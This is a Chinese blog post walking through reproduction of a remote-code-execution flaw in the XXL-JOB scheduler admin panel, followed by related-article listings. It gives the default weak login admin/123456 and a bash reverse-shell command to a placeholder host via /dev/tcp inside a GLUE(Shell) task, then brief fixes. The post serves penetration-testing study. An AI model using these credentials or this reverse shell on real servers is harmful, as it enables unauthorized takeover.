xxl-job弱口令登录后台RCE复现渗透测试

最新推荐文章于 2024-04-09 18:37:16 发布
最新推荐文章于 2024-04-09 18:37:16 发布
阅读量3.5k 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 数据安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118267720
版权

简介

XXL-JOB是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。
任务官方地址中文版:http://www.xuxueli.com/xxl-job

漏洞影响

xxl-job 全版本,获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。

漏洞复现

1.登录界面如下使用弱口令登录系统 admin/123456
登录界面

2.选择 任务管理 - 新增 填写以下信息 运行模式使用 GLUE(Shell) 其他随填 符合规则即可
新增任务

3.编辑GLUE 远程开启监听,进行反弹
编辑GLUE

#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/8000 <&1'

4.点击执行一次或者执行

5.反弹成功

注:笔者本次演示反弹较为顺利,读者在实际检测过程可能会遇到环境问题,比如:windows可结合windows反弹方式进行反弹,又或者linux 无执行权限,可借助其他方式getShell

修复建议

修复弱口令 任务调度限制内网访问

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关

欢迎讨论,持续更新中,感谢关注!

烽铃子
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXL-JOB 任务调度中心 后台任意命令执行漏洞
LiBai'S BLOG
10-17 3万+
在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。
XXL-JOB任务调度中心后台命令执行漏洞
失心少年
08-20 1521
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。5、查看网站有回显,命令被成功执行。2、选择任务管理模块,新增任务。4、操作选择执行一次。
漏洞实战(2):XXL-JOB默认密钥漏洞
OneMoreThink
03-20 1485
原理危害攻击搜索服务部署服务安装Java安装Maven安装XXL-JOB利用漏洞防御1、原理XXL-JOB[1]是一个分布式任务调度平台,分为调度中心和执行器两部分。在最新的两个版本中(2022年5月21日发布的2.3.1版本、2023年5月23日发布的2.4.0版本),XXL-JOB默认启用accessToken,在调度中心与执行器之间进行调度通讯时,用于证明自己的身份。accessToken的...
xxl-job反序列化漏洞记录
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
04-09 530
某次“春耕”期间,某业务系统发现xxl-job反序列化漏洞,通过该漏洞不仅爆破了页面账号密码,还获取了内网主机及数据库权限,“家”被偷了。XXL-JOB是一个轻量级分布式任务调度平台。支持通过web页面对任务进行操作,基于Java-spring boot框架开发,利用Maven依赖编译好,开箱即用。XXL-JOB任务调度中心后台存在命令执行漏洞,经过身份验证的(比如存在弱密码)攻击者可通过该漏洞接管服务器,造成严重信息泄露。
goby-win-x64-1.8.239.zip
05-25
扫描工具
浅析xxl-obj分布式任务调度平台RCE漏洞
道阻且长,行则将至。
12-29 2793
XXL-JOB 任务调度中心系统这几年被披露出存在多个后台命令执行漏洞,攻击者可以通过反弹 shell 执行任意命令,获取服务器管理权限。本文来分析、总结下 XXL-JOB 系统历史上几个 RCE 漏洞,为攻防工作积累 RCE 高危漏洞知识库。
xxl-job-执行器-RESTful-API-未授权访问-RCE
qq_41659863的博客
10-24 2785
xxl-job-执行器 后台 漏洞复现
一次代码审计到RCE的实战渗透案例
weixin_40418457的博客
04-30 964
某次做项目的时候遇到了XXL-JOB,当时并未公开任何xxl-job的漏洞,于是有了下面的代码审计,找到一处API接口的RCE,拿下一个严重漏洞。 一、XXL-JOB简介 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。简单来说,xxl-job用于管理分布式任务,若任务的管理功能出现未授权访问,将造成相当大的影响。 二、代码审计 1.下载xxl-job的源码,查看项目的开发框架、根据框架特性查找所有的API接口 访
XXL-JOB 默认 accessToken 身份绕过导致 RCE
千寻的博客
11-04 1483
XXL-JOB 默认配置下,用于调度通讯的` accessToken `不是随机生成的,而是使用 `application.properties `配置文件中的默认值。 在实际使用中如果没有修改默认值,攻击者可利用此`绕过认证调用 executor`,执行`任意代码`,从而`获取服务器权限`。
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
【Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
CVE-2020-0796微软SMBv3协议RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负简介SMB( 全 称 是 Server Message Block) 是 一 个 协 议 名 , 它 能 被 用 于 Web
[Timeline Sec] - CVE-2020-1947:ShardingSphere RCE 复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Apache是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Shar和Sidecar ( 规 划 中
Ice-001#-#Easy RCE using Docker API 复现1
07-25
Docker Daemon 作为守护进程,运行在后台,可以执行发送到管理接口上的 Docker 命令复现环境:各安装 docker安装 centos 因为现装的
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
【每日渗透笔记】后台弱口令+未授权尝试
10-29 8071
后台弱口令+未授权】纯属不放过任何可能
【漏洞库】XXL-JOB executor 未授权访问漏洞导致RCE
yuan_boss的博客
11-03 874
XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。注意,我们编写的EXP只能用一次,如果第二次用其他命令就无法命令执行了,除非目标的服务重启,我们才能执行其他的命令,不然只能一直使用第一次用的EXP。该问题类似于将一台Mysql、Redis实例,不设置密码并开放给公网,严格来说不能因此说Mysql、Redis有漏洞,只需要设置密码即可。复现环境与复现参考链接:https://vulhub.org/#/environments/xxl-job/unacc/
XXL-JOB从入门到源码(一)
daimeijin的博客
10-13 423
前言 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。目前介入使用的公司已达400+,拥有非常活跃的社区氛围。 开源社区地址 XXL开源社区 XXL-JOB 入门 依赖环境 Maven3+ Jdk1.8+ Mysql5.7+ 源码下载 源码仓库地址一 源码仓库地址二 数据库初始化 请下载项目源码并解压,获取 “调度数据库初始化SQL脚本” 并执行即可。 “调度数据库初始化SQL脚本” 位置为: /xxl-job
后台登录xxl-job-admin,实现后端对定时任务的增删改查
weixin_45753881的博客
04-03 1264
通过java代码实现xxl-job-admin的登录和xxl job的增删改查
xxl-jobRCE未授权远程命令执行分析+POC测试
Delphinidae
11-05 5468
xxl-job】远程命令执行漏洞 【参考地址】https://github.com/mrknow001/xxl-job-rce 【实际测试】指纹收集,指纹信息是respose 返回如下的可以试试 {“msg”:“invalid request, HttpMethod not support.”} 指纹收集:fofa,shodan ps: 只用于问题验证测试,禁止进行非法活动 ...
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的反序列化payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功复现了漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修复和防范。 总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值